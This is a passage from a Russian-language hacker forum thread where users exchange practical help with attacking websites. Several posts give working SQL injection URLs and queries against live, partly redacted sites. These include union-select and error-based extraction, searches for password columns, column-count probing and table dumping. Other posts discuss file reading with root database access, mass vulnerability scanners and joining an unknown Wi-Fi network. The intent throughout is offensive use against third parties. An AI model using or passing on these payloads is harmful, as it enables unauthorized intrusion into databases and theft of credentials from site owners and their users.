Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://[закрыто по просьбе правообладателя]/browse.php?cat=5'+and+1=2+union+select+111,222,333,concat_ws(0x2F,version(),database(),user()),555,666--+

    В сурсе
     
    #11201 ElteRUS, 27 Jan 2010
    Last edited: 27 Jan 2010
    1 person likes this.
  2. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    http://[hide]/browse.php?cat=5%27+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+column_name+LIKE+%27%password%%27+LIMIT+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)--++

    ну или так, если ты не хочешь колупать сорцы. ps. кури ману.
     
    #11202 v1d0qz, 27 Jan 2010
    Last edited: 27 Jan 2010
    2 people like this.
  3. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Даже не знаю где спросить. Ни у кого нету словарика таблиц и колонок, для 4-й ветки мускула? Я помню тут постили , тока найти не могу чё то.
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    2kfor
    https://forum.antichat.ru/nextnewesttothread56632.html
    http://forum.antichat.ru/thread45790.html
     
    _________________________
    1 person likes this.
  5. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Group_concat(table_name) всегда возвращает все таблицы(если есть доступ к information_schema)? И как чтобы он по базам возвращал а не все таблицы разом?
     
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Seravin:

    http://www.site.com/news.php?id=-1+union+select+0,1,group_concat(table_name),2+from+information_schema.tables+where+schema_name='xxx'
     
    1 person likes this.
  7. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    функция group_concat имеет ограничение на размер возвращаемых ей данных - 1024 символа, поэтому если таблиц слишком много в бд, то выведет не все
    по базам -
    select group_concat(table_name) from information_schema.tables where table_schema='имя_базы'
     
    1 person likes this.
  8. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Если очень нужно, чтоб прямо все разом, нужно воспользоваться циклической процедурой.
    Подробнее (см. посты #4, #5): https://forum.antichat.net/thread118842.html
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    0nep@t0p:
    для нево есть функция char()
     
  10. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    инъекция типа селект, пользователь рут, бд mysql5, пути раскрыты. есть читалка, но не полноценная, некоторые файлы не открывает, например, индекс не читает (индекс есть, прочитал .htaccess, управляет mod_rewrite), но пососедству скрипты открывает. не могу писать в файл, даже в тмп. в чем соль?

    ---
    еще когда делаешь запрос к information_schema.tables ответа нет от сервера. а при запросе mysql.user и schemata приходит.
     
    #11210 Fuckel, 28 Jan 2010
    Last edited: 28 Jan 2010
  11. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    не подскажите есть ли в инете скрипт или программа для проверки на уязвимость целого списка url`ов.
    примерно так - загружаешь урлы из текстовика, а программа их сканирует и выдает уязвимые?
     
  12. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    так обновление поста information_schema читается, только ответ идет долго-долго.
     
  13. xxakerx

    xxakerx New Member

    Joined:
    21 Nov 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    -5
    Простите за глупый вопрос но все таки я его снова подниму....

    Операционная система Vista.
    Поиска WI FI сетей и там находит безымянную сеть не зашифрованную....
    Как к ней подключиться и узнать ее имя? Другой операционки нету и поставить нет возможности(
     
  14. Monsieur

    Monsieur New Member

    Joined:
    17 Jan 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Или можно устроить конкатенацию полями
    HTML:
    select group_concat(field) from (select concat_ws(0x3a,table_name) as field from information_schema.tables limit 0,20 ) as t
     
    1 person likes this.
  15. гостъ

    гостъ New Member

    Joined:
    4 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0

    Сломал мозг, ты же сам ответил на свой вопрос!!1 Онотоле
     
  16. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Имеется иньекция, при подставлени кавычки выдает следующее:
    Code:
    select surname, name, patronymic from people where id = 851'
    
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 4
    Проверяю:
    Code:
    +and+1=1
    Code:
    +and+1=2
    В первом случае выводит, во втором пусто, -> иньекция

    Составляю запрос вида:

    Code:
    +union+select+1,2,3+--+
    В ответ получаю:

    Code:
    [B]select *[/B] from people where id = 851 union select 1,2,3 --  
    
    The used SELECT statements have a different number of columns
    Почему во втором запросе исчезают значения, которые берет он сам, и что с этим можно сделать?
     
  17. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Почему именно union select 1,2,3 ?! Значит там другое кол-во полей в запросе,order by'ем проверяй.
     
  18. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Так он же раскрывает полностью запрос при подставлении кавычки
    Code:
    select surname, name, patronymic from people where id = 851'
    
    Впрочем проверяю:

    Code:
    +order+by+1
    +order+by+1,2
    +order+by+1,2,3
    Выводит нормально

    Code:
    +order+by+1,2,3,4
    Code:
    select surname, name, patronymic from people where id = 851 order by 1,2,3,4
    
    Unknown column '4' in 'order clause'
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Блин ты вообще прочитал тему?
    Переберай колонки епте.
    union select 1,2,3,4 --
     
    1 person likes this.
  20. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а.
    http://forum.antichat.ru/threadnav119047-2-10.html
     
    1 person likes this.
Thread Status:
Not open for further replies.